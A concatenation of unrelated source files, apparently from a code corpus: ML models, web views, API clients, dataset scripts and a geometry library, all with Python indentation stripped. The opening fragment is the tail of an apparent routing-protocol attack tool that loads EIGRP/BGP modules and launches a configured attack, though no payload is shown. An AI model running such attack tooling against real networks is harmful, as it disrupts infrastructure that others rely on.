load_contrib('eigrp')
load_contrib('bgp')
attack = config['attack']['object']()
print("[+] Launching attack: {}".format(config['attack']['desc']))
if attack.injectOptions(config['attack']['params'], config):
attack.launch()
else:
Logger.err("Module prerequisite options were not passed correctly.")
if __name__ == '__main__':
main(sys.argv)
|
the-stack_0_12350 | import torch
import torch.nn as nn
from torch.autograd import Variable
class RNN(nn.Module):
def __init__(self, input_size, hidden_size, output_size, n_layers=1):
super(RNN, self).__init__()
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = output_size
self.n_layers = n_layers
self.encoder = nn.Embedding(input_size, hidden_size)
self.gru = nn.GRU(hidden_size, hidden_size, n_layers)
self.decoder = nn.Linear(hidden_size, output_size)
def forward(self, input, hidden):
input = self.encoder(input.view(1, -1))
output, hidden = self.gru(input.view(1, 1, -1), hidden)
output = self.decoder(output.view(1, -1))
return output, hidden
def init_hidden(self):
return Variable(torch.zeros(self.n_layers, 1, self.hidden_size))
|
the-stack_0_12353 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A Mesos-customized entry point to the thermos_observer webserver."""
import time
from twitter.common import app
from twitter.common.exceptions import ExceptionalThread
from twitter.common.log.options import LogOptions
from twitter.common.quantity import Amount, Time
from apache.aurora.executor.common.path_detector import MesosPathDetector
from apache.thermos.observer.http.configure import configure_server
from apache.thermos.observer.task_observer import TaskObserver
app.add_option(
'--mesos-root',
dest='mesos_root',
type='string',
default=MesosPathDetector.DEFAULT_MESOS_ROOT,
help='The mesos root directory to search for Thermos executor sandboxes [default: %default]')
app.add_option(
'--port',
dest='port',
type='int',
default=1338,
help='The port on which the observer should listen.')
app.add_option(
'--polling_interval_secs',
dest='polling_interval_secs',
type='int',
default=int(TaskObserver.POLLING_INTERVAL.as_(Time.SECONDS)),
help='The number of seconds between observer refresh attempts.')
# Allow an interruptible sleep so that ^C works.
def sleep_forever():
while True:
time.sleep(1)
def initialize(options):
path_detector = MesosPathDetector(options.mesos_root)
polling_interval = Amount(options.polling_interval_secs, Time.SECONDS)
return TaskObserver(path_detector, interval=polling_interval)
def main(_, options):
observer = initialize(options)
observer.start()
root_server = configure_server(observer)
thread = ExceptionalThread(target=lambda: root_server.run('0.0.0.0', options.port, 'cherrypy'))
thread.daemon = True
thread.start()
sleep_forever()
LogOptions.set_stderr_log_level('google:INFO')
app.main()
|
the-stack_0_12355 | #!/usr/bin/python3
def safe_print_list(my_list=[], x=0):
i = 0
for j in range(0, x):
try:
print(my_list[j], end='')
i = i + 1
except:
break
print()
return i
|
the-stack_0_12357 | #!/usr/bin/env python
# -*- coding:utf-8 -*-
# @Author: Jialiang Shi
from gerrit.utils.models import BaseModel
class Message(BaseModel):
def __init__(self, **kwargs):
super(Message, self).__init__(**kwargs)
self.attributes = [
"id",
"_revision_number",
"message",
"date",
"author",
"real_author",
"tag",
"change",
"gerrit",
]
def delete(self, input_=None):
"""
Deletes a change message.
Note that only users with the Administrate Server global capability are permitted to delete a change message.
.. code-block:: python
input_ = {
"reason": "spam"
}
change = gerrit.changes.get('myProject~stable~I10394472cbd17dd12454f229e4f6de00b143a444')
message = change.messages.get("babf4c5dd53d7a11080696efa78830d0a07762e6")
result = message.delete(input_)
# or
result = message.delete()
:param input_: the DeleteChangeMessageInput entity,
https://gerrit-review.googlesource.com/Documentation/rest-api-changes.html#delete-change-message-input
:return:
"""
if input_ is None:
endpoint = "/changes/%s/messages/%s" % (self.change, self.id)
self.gerrit.requester.delete(self.gerrit.get_endpoint_url(endpoint))
else:
endpoint = "/changes/%s/messages/%s/delete" % (self.change, self.id)
base_url = self.gerrit.get_endpoint_url(endpoint)
response = self.gerrit.requester.post(
base_url, json=input_, headers=self.gerrit.default_headers
)
result = self.gerrit.decode_response(response)
change = self.gerrit.changes.get(self.change)
return change.messages.get(result.get("id"))
class Messages(object):
def __init__(self, change, gerrit):
self.change = change
self.gerrit = gerrit
def list(self):
"""
Lists all the messages of a change including detailed account information.
:return:
"""
endpoint = "/changes/%s/messages" % self.change
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse_list(result, change=self.change, gerrit=self.gerrit)
def get(self, id_):
"""
Retrieves a change message including detailed account information.
:param id_: change message id
:return:
"""
endpoint = "/changes/%s/messages/%s" % (self.change, id_)
response = self.gerrit.requester.get(self.gerrit.get_endpoint_url(endpoint))
result = self.gerrit.decode_response(response)
return Message.parse(result, change=self.change, gerrit=self.gerrit)
|
the-stack_0_12358 | from __future__ import absolute_import, print_function
import typing
import gym
from core import Action
from graphic import CursesSnake
class SnakeEnv(gym.Env):
"""
0 -> go straight
1 -> turn left
2 -> turn right
"""
action_space = [0, 1, 2]
def __init__(self, shape: [typing.List[int], typing.Tuple[int, int]] = (4, 4)):
self.shape = shape
self.curses_snake: CursesSnake = ...
action_space = Action
up, down, left, right, none = (action_space.UP, action_space.DOWN, action_space.LEFT,
action_space.RIGHT, action_space.NONE)
self.direction_env_action_to_game_action: typing.Dict[int, typing.List[int]] = {
up: [none, left, right],
down: [none, right, left],
left: [none, down, up],
right: [none, up, down]
}
self.reset()
def reset(self) -> typing.List[typing.List[int]]:
self.curses_snake = CursesSnake(self.shape)
return self.curses_snake.snake.game_board.data
def render(self, mode='human') -> None:
self.curses_snake.render()
def step(self, action: int) -> (typing.List[typing.List[int]], float, bool, typing.Any):
return self.curses_snake.snake.step(
self.direction_env_action_to_game_action[
self.curses_snake.snake.snake.direction][action])
def close(self):
self.curses_snake.close()
def seed(self, seed=None):
pass
|
the-stack_0_12359 | # Create your views here.
from django import forms, http
from django.http import Http404, HttpResponse
from django.views.generic import ListView, View, CreateView, FormView, UpdateView
from django.views.generic.base import TemplateView
from django.http import HttpResponseRedirect
from core.views import AuthorizedOrganizationMixin, AuthorizedOrganizationEditMixin, ConfirmationObjectView
from django.utils import simplejson
from core.views import PathMixin
from django.core.urlresolvers import reverse
from braces.views import LoginRequiredMixin
from django.template.defaultfilters import slugify
from experiment.forms import ExperimentManualForm, ExperimentAddForm
from protocols.models import Protocol, Step, Action, Thermocycle, Machine, Component
from organization.models import Organization
from schedule.models import Calendar
from experiment.models import Experiment
from protocols.utils import VERB_CHOICES, VERB_FORM_DICT
from workflow.models import Workflow
class ExperimentSetupMixin(PathMixin):
pathEnd = {}
titleMarks = {'suffix':"",'prefix':""}
def get_context_data(self, **kwargs):
context = super(ExperimentSetupMixin, self).get_context_data(**kwargs)
experiment_slug = self.kwargs.get('experiment_slug', None)
prefix = self.titleMarks['prefix']
suffix = self.titleMarks['suffix']
title = ""
if experiment_slug:
context['experiment'] = self.request.user.experiment_set.get(slug=experiment_slug)
context['organization'] = context['experiment'].owner
context['workflow'] = context['experiment'].workflow
else:
owner_slug = self.kwargs.get('owner_slug', None)
if owner_slug:
context['organization'] = self.request.user.organization_set.get(slug=owner_slug)
if 'organization' in context:
context['paths'].append({'name':context['organization'].name, 'url':context['organization'].get_absolute_url()})
title = context['organization'].name
if 'experiment' in context:
context['paths'].append({'name':context['experiment'].name, 'url':context['experiment'].get_absolute_url()})
prefix = title
title = context['experiment'].name
if self.pathEnd:
context['paths'].append( self.pathEnd )
suffix = self.pathEnd['name']
else:
del(context['paths'][-1]['url'])
if title:
context['titleBlock'] = {'prefix':prefix, 'title':title, 'suffix':suffix}
return context
class ExperimentDetailView(ExperimentSetupMixin, LoginRequiredMixin, TemplateView):
model = Experiment
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_detail.html"
def get_context_data(self, **kwargs):
context = super(ExperimentDetailView, self).get_context_data(**kwargs)
return context
class ExperimentUpdateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'Edit'}
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
slug = self.kwargs.get('experiment_slug', None)
exp = self.request.user.experiment_set.get(slug=slug)
oldWorkflow = exp.workflow
oldName = exp.name
exp.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
exp.name = form.cleaned_data['name']
exp.slug = slugify(exp.name)
exp.save()
if oldWorkflow != exp.workflow:
workflowChanged = True
else:
workflowChanged = False
if oldName != exp.name:
nameChanged = True
else:
nameChanged = False
for cal in self.request.user.calendar_set.all():
if exp.pk in cal.data['meta']['experiments']:
cal.updateCalendar(exp, workflowChanged, nameChanged)
return HttpResponseRedirect(exp.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user and w!=exp.workflow]
workflows.insert(0,exp.workflow)
form.initial['name'] = exp.name
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
return form
except:
# try:
# org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
# workflows = org.workflow_set.all()
# workflows = [w for w in workflows if w.user==self.request.user]
# form.fields['workflows'] = forms.ChoiceField(
# label="Workflows",
# choices=((x.pk,x) for x in workflows))
# except:
# raise Http404
# return form
raise Http404
class ExperimentAddView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentAddForm
slug_url_kwarg = "experiment_slug"
template_name = "experiment/experiment_add.html"
pathEnd = {'name':'Add to Calendar'}
def form_valid(self, form):
try:
calendarPKs = [x[0] for x in form.cleaned_data['calendars']]
calendars = self.request.user.calendar_set.filter(pk__in=calendarPKs)
exp = self.request.user.experiment_set.get(slug=self.kwargs['experiment_slug'])
for cal in calendars:
cal.addExperiment(exp)
return HttpResponseRedirect(calendars[0].get_absolute_url())
except:
raise Http404
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
calendars = self.request.user.calendar_set.all()
form.fields['calendars'] = forms.MultipleChoiceField(
label="Calendars",
widget=forms.CheckboxSelectMultiple,
choices=((x.pk,x) for x in calendars))
except:
raise Http404
return form
# def post(self, request, *args, **kwargs):
# '''This is done to handle the two forms'''
# form = self.form_class(request.POST)
# if form.is_valid():
# return self.form_valid(form)
# else:
# return self.form_invalid(form)
# def form_invalid(self, form):
# return self.render_to_response(self.get_context_data(form=form))
class ExperimentCreateView(ExperimentSetupMixin, LoginRequiredMixin, FormView):
model = Experiment
form_class = ExperimentManualForm
slug_url_kwarg = "owner_slug"
template_name = "experiment/experiment_form.html"
pathEnd = {'name':'New Experiment'}
def get_success_url(self):
return self.get_absolute_url()
def form_valid(self, form):
slug = self.kwargs.get(self.slug_url_kwarg, None)
org = self.request.user.organization_set.get(slug=slug)
e = Experiment()
e.user = self.request.user
e.workflow = self.request.user.workflow_set.get(pk=form.cleaned_data['workflows'][0])
e.data = {'meta':{}}
e.name = form.cleaned_data['name']
e.slug = slugify(form.cleaned_data['name'])
e.owner = org
e.save()
return HttpResponseRedirect(e.get_absolute_url())
def get_form(self, form_class):
form = form_class(**self.get_form_kwargs())
try:
org = self.request.user.organization_set.get(slug=self.kwargs['owner_slug'])
workflows = org.workflow_set.all()
workflows = [w for w in workflows if w.user==self.request.user]
form.fields['workflows'] = forms.ChoiceField(
label="Workflows",
choices=((x.pk,x) for x in workflows))
except:
raise Http404
return form
|
the-stack_0_12361 | # https://www.acmicpc.net/problem/17135
def dfs(cur, depth):
if depth == 3:
# print(case)
check()
return
if cur == M:
return
dfs(cur + 1, depth)
case.append(cur)
dfs(cur + 1, depth + 1)
case.pop()
def check():
cnt = 0
for _ in range(N):
cnt += count_dead()
down()
for row, line in enumerate(temp):
graph[row] = line[:]
res.append(cnt)
def down():
for idx in range(N - 1, 0, -1):
graph[idx] = graph[idx - 1]
graph[0] = [0 for _ in range(M)]
def count_dead():
dead = [0 for _ in range(M)]
kill = list()
for arrow in case:
candi = list()
for row in range(N):
for col in range(M):
if graph[row][col] == 0:
continue
dist = abs(col - arrow) + abs(row - N)
if dist <= D:
candi.append((dist, col, row))
if candi:
candi = sorted(candi)
dead[candi[0][1]] = 1
kill.append(candi[0])
for k in kill:
graph[k[2]][k[1]] = 0
return sum(dead)
if __name__ == '__main__':
input = __import__('sys').stdin.readline
N, M, D = map(int,input().split())
graph = [list(map(int,input().split())) for _ in range(N)]
temp = [[] for _ in range(N)]
for row in range(N):
temp[row] = graph[row][:]
case = list()
res = list()
dfs(0, 0)
print(max(res)) |
the-stack_0_12363 | import numpy as np
import matplotlib.pyplot as plt
from PIL import Image
from scipy.misc import imresize
from operator import itemgetter
import cv2
import pdb
# actions imshow convenience function
def actions_imshow(img,im_size):
plt.imshow(img.reshape([im_size,im_size,3]))
plt.axis('off')
# load Stanford-40 Actions dataset
def load_actions(path, inp_size):
# read filenames and labels
fid = open(path+"images.txt","r")
img_names = fid.read().splitlines()
fid.close()
fid = open(path+"labels.txt","r")
lbl_names = fid.read().splitlines()
fid.close()
fid = open(path+"splits.txt","r")
spl_names = fid.read().splitlines()
fid.close()
# parse splits
splits = []
for m in xrange(len(spl_names)):
splits.append(int(spl_names[m]))
# parse labels
trn_lbl = []
val_lbl = []
tst_lbl = []
for m in xrange(len(lbl_names)):
if splits[m]==3:
tst_lbl.append(int(lbl_names[m])-1)
else:
if splits[m]==2:
val_lbl.append(int(lbl_names[m])-1)
else:
trn_lbl.append(int(lbl_names[m])-1)
# parse images
trn_img = []
val_img = []
tst_img = []
for m in xrange(len(img_names)):
# read the image
data = cv2.imread(path+"JPEGImages/"+img_names[m])
#data = np.asarray(data)
if len(data.shape)==2:
data = np.repeat(data[:,:, np.newaxis], 3, axis=2)
data = imresize(data,(inp_size, inp_size, 3))
#pdb.set_trace()
# add it to the corresponding split
if splits[m]==3:
tst_img.append(data)
else:
if splits[m]==2:
val_img.append(data)
else:
trn_img.append(data)
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# return a new actions dataset
def disjoint_actions(actions,nums):
pos_trn = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[3]) == nums[i])[0]
pos_trn = np.hstack((pos_trn,tmp))
pos_trn = np.asarray(pos_trn).astype(int)
np.random.shuffle(pos_trn)
pos_tst = []
for i in range(len(nums)):
tmp = np.where(np.asarray(actions[5]) == nums[i])[0]
pos_tst = np.hstack((pos_tst,tmp))
pos_tst = np.asarray(pos_tst).astype(int)
np.random.shuffle(pos_tst)
trn_img = itemgetter(*pos_trn)(actions[0])
val_img = actions[1]
tst_img = itemgetter(*pos_tst)(actions[2])
trn_lbl = itemgetter(*pos_trn)(actions[3])
val_lbl = actions[4]
tst_lbl = itemgetter(*pos_tst)(actions[5])
return trn_img, val_img, tst_img, trn_lbl, val_lbl, tst_lbl
# get equally distributed samples among given classes from a split
def get_ed_samples(data, samples=10):
# retrieve number of samples for each class
indx = []
classes = np.unique(data.labels)
for cl in range(len(classes)):
tmp = np.where(data.labels == classes[cl])[0]
np.random.shuffle(tmp)
indx = np.hstack((indx,tmp[0:np.min(samples, len(tmp))]))
indx = np.asarray(indx).astype(int)
return indx
|
the-stack_0_12365 | import setuptools
with open("README.md", "r") as f:
long_description = f.read()
setuptools.setup(
name="argtyped",
version="0.3.1",
url="https://github.com/huzecong/argtyped",
author="Zecong Hu",
author_email="[email protected]",
description="Command line arguments, with types",
long_description=long_description,
long_description_content_type="text/markdown",
license="MIT License",
packages=setuptools.find_packages(),
package_data={
"argtyped": [
"py.typed", # indicating type-checked package
],
},
platforms="any",
install_requires=[],
classifiers=[
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Operating System :: OS Independent",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Topic :: System :: Shells",
"Topic :: Utilities",
"Typing :: Typed",
],
python_requires=">=3.6",
)
|
the-stack_0_12369 | """This package includes all the modules related to data loading and preprocessing
To add a custom dataset class called 'dummy', you need to add a file called 'dummy_dataset.py' and define a subclass 'DummyDataset' inherited from BaseDataset.
You need to implement four functions:
-- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).
-- <__len__>: return the size of dataset.
-- <__getitem__>: get a data point from data loader.
-- <modify_commandline_options>: (optionally) add dataset-specific options and set default options.
Now you can use the dataset class by specifying flag '--dataset_mode dummy'.
See our template dataset class 'template_dataset.py' for more details.
"""
import importlib
import torch.utils.data
from data.base_dataset import BaseDataset
from data.base3D_dataset import BaseDataset3D
def find_dataset_using_name(dataset_name):
"""Import the module "data/[dataset_name]_dataset.py".
In the file, the class called DatasetNameDataset() will
be instantiated. It has to be a subclass of BaseDataset,
and it is case-insensitive.
"""
dataset_filename = "data." + dataset_name + "_dataset"
datasetlib = importlib.import_module(dataset_filename)
dataset = None
target_dataset_name = dataset_name.replace('_', '') + 'dataset'
for name, cls in datasetlib.__dict__.items():
if name.lower() == target_dataset_name.lower() \
and (issubclass(cls, BaseDataset) or issubclass(cls, BaseDataset3D)):
dataset = cls
if dataset is None:
raise NotImplementedError("In %s.py, there should be a subclass of BaseDataset with class name that matches %s in lowercase." % (dataset_filename, target_dataset_name))
return dataset
def get_option_setter(dataset_name):
"""Return the static method <modify_commandline_options> of the dataset class."""
dataset_class = find_dataset_using_name(dataset_name)
return dataset_class.modify_commandline_options
def create_dataset(opt):
"""Create a dataset given the option.
This function wraps the class CustomDatasetDataLoader.
This is the main interface between this package and 'train.py'/'test.py'
Example:
>>> from data import create_dataset
>>> dataset = create_dataset(opt)
"""
data_loader = CustomDatasetDataLoader(opt)
dataset = data_loader.load_data()
return dataset
class CustomDatasetDataLoader():
"""Wrapper class of Dataset class that performs multi-threaded data loading"""
def __init__(self, opt):
"""Initialize this class
Step 1: create a dataset instance given the name [dataset_mode]
Step 2: create a multi-threaded data loader.
"""
self.opt = opt
dataset_class = find_dataset_using_name(opt.dataset_mode)
self.dataset = dataset_class(opt)
print("dataset [%s] was created" % type(self.dataset).__name__)
self.dataloader = torch.utils.data.DataLoader(
self.dataset,
batch_size=opt.batch_size,
shuffle=not opt.serial_batches,
num_workers=int(opt.num_threads),
drop_last=True if opt.isTrain else False,
)
self.i = None
def set_epoch(self, epoch):
self.dataset.current_epoch = epoch
def load_data(self):
return self
def __len__(self):
"""Return the number of data in the dataset"""
return min(len(self.dataset), self.opt.max_dataset_size)
def __iter__(self):
"""Return a batch of data"""
#for i, data in enumerate(self.dataloader):
# if i * self.opt.batch_size >= self.opt.max_dataset_size:
# break
# yield data
self.i = 0
return iter(self.dataloader)
def __next__(self):
if self.i * self.opt.batch_size >= self.opt.max_dataset_size:
raise StopIteration()
item = next(self.dataloader)
self.i += 1
return item
|
the-stack_0_12371 | from itertools import chain
from typing import Iterable
from ground.base import (Context,
Location,
Orientation,
Relation)
from ground.hints import (Contour,
Multisegment,
Point,
Segment)
from . import box
from .events_queue import (CompoundEventsQueue,
LinearEventsQueue)
from .hints import SegmentEndpoints
from .multisegment import to_segments_endpoints
from .processing import (process_closed_linear_queue,
process_open_linear_queue)
from .segment import (locate_point as locate_point_to_segment,
relate_segment as relate_segments)
def locate_point(contour: Contour, point: Point, context: Context) -> Location:
return (Location.EXTERIOR
if all(locate_point_to_segment(segment, point, context)
is Location.EXTERIOR
for segment in context.contour_segments(contour))
else Location.BOUNDARY)
def relate_segment(contour: Contour,
segment: Segment,
context: Context) -> Relation:
angle_orientation = context.angle_orientation
has_no_touch = has_no_cross = True
last_touched_edge_index = last_touched_edge_start = None
start, end = segment.start, segment.end
for index, sub_segment in enumerate(context.contour_segments(contour)):
sub_segment_start, sub_segment_end = sub_segment_endpoints = (
sub_segment.start, sub_segment.end)
relation = relate_segments(sub_segment, segment, context)
if relation is Relation.COMPONENT or relation is Relation.EQUAL:
return Relation.COMPONENT
elif relation is Relation.OVERLAP or relation is Relation.COMPOSITE:
return Relation.OVERLAP
elif relation is Relation.TOUCH:
if has_no_touch:
has_no_touch = False
elif (has_no_cross
and index - last_touched_edge_index == 1
and start not in sub_segment_endpoints
and end not in sub_segment_endpoints
and (angle_orientation(start, end, sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start,
last_touched_edge_start,
sub_segment_start,
sub_segment_end,
context)):
has_no_cross = False
last_touched_edge_index = index
last_touched_edge_start = sub_segment_start
elif has_no_cross and relation is Relation.CROSS:
has_no_cross = False
vertices = contour.vertices
if (has_no_cross
and not has_no_touch
and last_touched_edge_index == len(vertices) - 1):
first_sub_segment_endpoints = (first_sub_segment_start,
first_sub_segment_end) = (vertices[-1],
vertices[0])
if (relate_segments(context.segment_cls(first_sub_segment_start,
first_sub_segment_end),
segment,
context) is Relation.TOUCH
and start not in first_sub_segment_endpoints
and end not in first_sub_segment_endpoints
and (angle_orientation(start, end, first_sub_segment_start)
is Orientation.COLLINEAR)
and point_vertex_line_divides_angle(start, vertices[-2],
first_sub_segment_start,
first_sub_segment_end,
context)):
has_no_cross = False
return ((Relation.DISJOINT if has_no_touch else Relation.TOUCH)
if has_no_cross
else Relation.CROSS)
def point_vertex_line_divides_angle(point: Point,
first_ray_point: Point,
vertex: Point,
second_ray_point: Point,
context: Context) -> bool:
return (context.angle_orientation(vertex, first_ray_point, point)
is context.angle_orientation(vertex, point, second_ray_point))
def relate_multisegment(contour: Contour,
multisegment: Multisegment,
context: Context) -> Relation:
contour_bounding_box = context.contour_box(contour)
multisegment_bounding_box = context.segments_box(multisegment.segments)
if box.disjoint_with(contour_bounding_box, multisegment_bounding_box):
return Relation.DISJOINT
events_queue = LinearEventsQueue(context)
events_queue.register(to_edges_endpoints(contour),
from_test=False)
events_queue.register(to_segments_endpoints(multisegment),
from_test=True)
return process_open_linear_queue(events_queue,
min(contour_bounding_box.max_x,
multisegment_bounding_box.max_x))
def relate_contour(goal: Contour, test: Contour, context: Context) -> Relation:
goal_bounding_box, test_bounding_box = (context.contour_box(goal),
context.contour_box(test))
if box.disjoint_with(goal_bounding_box, test_bounding_box):
return Relation.DISJOINT
if equal(goal, test, context):
return Relation.EQUAL
events_queue = CompoundEventsQueue(context)
events_queue.register(to_oriented_edges_endpoints(goal, context),
from_test=False)
events_queue.register(to_oriented_edges_endpoints(test, context),
from_test=True)
return process_closed_linear_queue(events_queue,
min(goal_bounding_box.max_x,
test_bounding_box.max_x))
def equal(left: Contour, right: Contour, context: Context) -> bool:
left_vertices, right_vertices = left.vertices, right.vertices
if len(left_vertices) != len(right_vertices):
return False
try:
index = right_vertices.index(left_vertices[0])
except ValueError:
return False
same_oriented = orientation(left, context) is orientation(right, context)
right_step = 1 if same_oriented else -1
size = len(left_vertices)
indices = chain(zip(range(size),
range(index, size)
if same_oriented
else range(index, -1, right_step)),
zip(range(size - index if same_oriented else index + 1,
size),
range(index)
if same_oriented
else range(size - 1, index - 1, right_step)))
return all(left_vertices[left_index] == right_vertices[right_index]
for left_index, right_index in indices)
def orientation(contour: Contour, context: Context) -> Orientation:
vertices = contour.vertices
index = min(range(len(vertices)),
key=vertices.__getitem__)
return context.angle_orientation(vertices[index - 1], vertices[index],
vertices[(index + 1) % len(vertices)])
def to_edges_endpoints(contour: Contour) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return ((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
def to_oriented_edges_endpoints(contour: Contour,
context: Context,
clockwise: bool = False
) -> Iterable[SegmentEndpoints]:
vertices = contour.vertices
return (((vertices[index - 1], vertices[index])
for index in range(len(vertices)))
if (orientation(contour, context)
is (Orientation.CLOCKWISE
if clockwise
else Orientation.COUNTERCLOCKWISE))
else ((vertices[index], vertices[index - 1])
for index in range(len(vertices) - 1, -1, -1)))
|
the-stack_0_12372 |
from aiohttp import web
from tt_web import log
from tt_web import postgresql
async def on_startup(app):
await postgresql.initialize(app['config']['database'])
async def on_cleanup(app):
await postgresql.deinitialize()
def register_routers(app):
from . import handlers
app.router.add_post('/apply', handlers.apply)
app.router.add_post('/get-items', handlers.get_items)
app.router.add_post('/has-items', handlers.has_items)
app.router.add_post('/get-item-logs', handlers.get_item_logs)
app.router.add_post('/debug-clear-service', handlers.debug_clear_service)
def create_application(config):
app = web.Application()
app['config'] = config
log.initilize(config['log'])
app.on_startup.append(on_startup)
app.on_cleanup.append(on_cleanup)
register_routers(app)
return app
|
the-stack_0_12374 | """Process the raw ShEMO dataset.
This assumes the file structure from the original compressed file:
/.../
male/
*.wav
female/
...
"""
from pathlib import Path
import click
from ertk.dataset import resample_audio, write_annotations, write_filelist
from ertk.utils import PathlibPath
emotion_map = {
"A": "anger",
"H": "happiness",
"N": "neutral",
"S": "sadness",
"W": "surprise",
"F": "fear",
}
unused_emotions = ["F"]
@click.command()
@click.argument("input_dir", type=PathlibPath(exists=True, file_okay=False))
@click.option("--resample/--noresample", default=True)
def main(input_dir: Path, resample: bool):
"""Process the ShEMO dataset at location INPUT_DIR and resample
audio to 16 kHz 16-bit WAV audio.
"""
paths = list(input_dir.glob("*/*.wav"))
if resample:
resample_dir = Path("resampled")
resample_audio(paths, resample_dir)
write_filelist(resample_dir.glob("*.wav"), "files_all")
write_filelist(
[p for p in resample_dir.glob("*.wav") if p.stem[3] not in unused_emotions],
"files_5class",
)
write_annotations({p.stem: emotion_map[p.stem[3]] for p in paths}, "label")
speaker_dict = {p.stem: p.stem[:3] for p in paths}
write_annotations(speaker_dict, "speaker")
write_annotations({k: v[0] for k, v in speaker_dict.items()}, "gender")
write_annotations({p.stem: "ar" for p in paths}, "language")
if __name__ == "__main__":
main()
|
the-stack_0_12376 | import torch.nn as nn
import torch
from modules.lstm_encoder import LSTMEncoder
from modules.self_attention import SelfAttention
from modules.binary_decoder import BinaryDecoder
class BinaryLSTMClassifier(nn.Module):
def __init__(self, emb_dim, hidden_dim, vocab_size, num_label, attention_mode, args):
super(BinaryLSTMClassifier, self).__init__()
self.num_label = num_label
self.hidden_dim = hidden_dim
self.vocab_size = vocab_size
self.emb_dim = emb_dim
self.args = args
# Encoder
self.encoder = LSTMEncoder(emb_dim, hidden_dim, vocab_size, encoder_dropout=args.encoder_dropout)
if self.encoder.bidirectional:
hidden_dim = hidden_dim * 2
# Init Attention
if attention_mode == 'self':
self.att = SelfAttention
elif attention_mode == 'None':
self.att = None
if self.att is not None:
self.attention_layer = self.att(hidden_dim)
# Decoder
self.decoder = BinaryDecoder(hidden_dim, num_label)
def load_encoder_embedding(self, emb, fix_emb=False):
self.encoder.embeddings.weight = nn.Parameter(torch.FloatTensor(emb))
if fix_emb:
self.encoder.embeddings.weight.requires_grad = False
def forward(self, x, seq_len, elmo):
out, hidden = self.encoder(x, seq_len, elmo)
if self.att is not None:
out, alpha = self.attention_layer(out, seq_len.view(-1))
else:
seq_len_expand = seq_len.view(-1, 1, 1).expand(out.size(0), 1, out.size(2)) - 1
out = torch.gather(out, 1, seq_len_expand).squeeze(1)
pred = self.decoder(out)
return pred
|
the-stack_0_12377 | #!/usr/bin/env python
import urllib
import json
import os
from flask import Flask
from flask import request
from flask import make_response
# Flask app should start in global layout
app = Flask(__name__)
@app.route('/webhook', methods=['POST'])
def webhook():
req = request.get_json(silent=True, force=True)
print("Request:")
print(json.dumps(req, indent=4))
res = makeWebhookResult(req)
res = json.dumps(res, indent=4)
print(res)
r = make_response(res)
r.headers['Content-Type'] = 'application/json'
return r
def makeWebhookResult(req):
if req.get("result").get("action") != "shipping.cost":
return {}
result = req.get("result")
parameters = result.get("parameters")
zone = parameters.get("shipping-zone")
cost = {'Europe':100, 'North America':200, 'South America':300, 'Asia':400, 'Africa':500}
speech = "The cost of shipping to " + zone + " is " + str(cost[zone]) + " euros."
print("Response:")
print(speech)
return {
"speech": speech,
"displayText": speech,
"data": {},
"contextOut": [],
"source": "apiai-onlinestore-shipping"
}
if __name__ == '__main__':
port = int(os.getenv('PORT', 5000))
print("Starting app on port %d" % port)
app.run(debug=True, port=port, host='0.0.0.0')
|
the-stack_0_12378 |
from ast import Continue
from astropy.io import fits
import numpy as np
import matplotlib.pyplot as plt
import astropy.units as u
from astropy.wcs import WCS
from astropy.coordinates import SkyCoord
import pandas as pd
from photutils.aperture import SkyRectangularAperture, SkyCircularAperture
from .imaging import implot
from astroquery.skyview import SkyView
__all__ = ['Target']
class Target():
def __init__(self,name,parse_name=True,coordinates=None,coord_units=None):
'''
Initializes the Target object.
Parameters
----------
name: str
name to use for the target throughout the suite.
parse_name: bool, optional, default True
If the name is that of a known object resolvable by Simbad, parse it to determine coordinates.
coordinates: SkyCoord or str, optional, default None
If parse_name is False, supply coordinates for the target manually. Must be a SkyCoord object or string with coordinates. If string, coord_units must be supplied.
coord_units: tuple or str, optional, default None
if supplying coordinates as a string, the units as accepted by SkyCoord must be provided, e.g., (u.hourangle,u.deg) or 'deg'.
Returns
-------
None
Sets
----
configs: dict
a dictionary containing configuration information.
Notes
-----
It is not strictly necessary for the Target itself to have coordinates defined, but every configuration must.
'''
self.name = name
if parse_name:
self.coordinates = SkyCoord.from_name(name)
else:
if coordinates is not None:
if isinstance(coordinates,str):
if coord_units is None:
raise AssertionError('When providing string coordinates, a coordinate units accepted by SkyCoord are required to be passed to coord_units')
else:
self.coordinates = SkyCoord(coordinates,unit=coord_units)
elif isinstance(coordinates,SkyCoord):
self.coordinates = coordinates
self.configs = {}
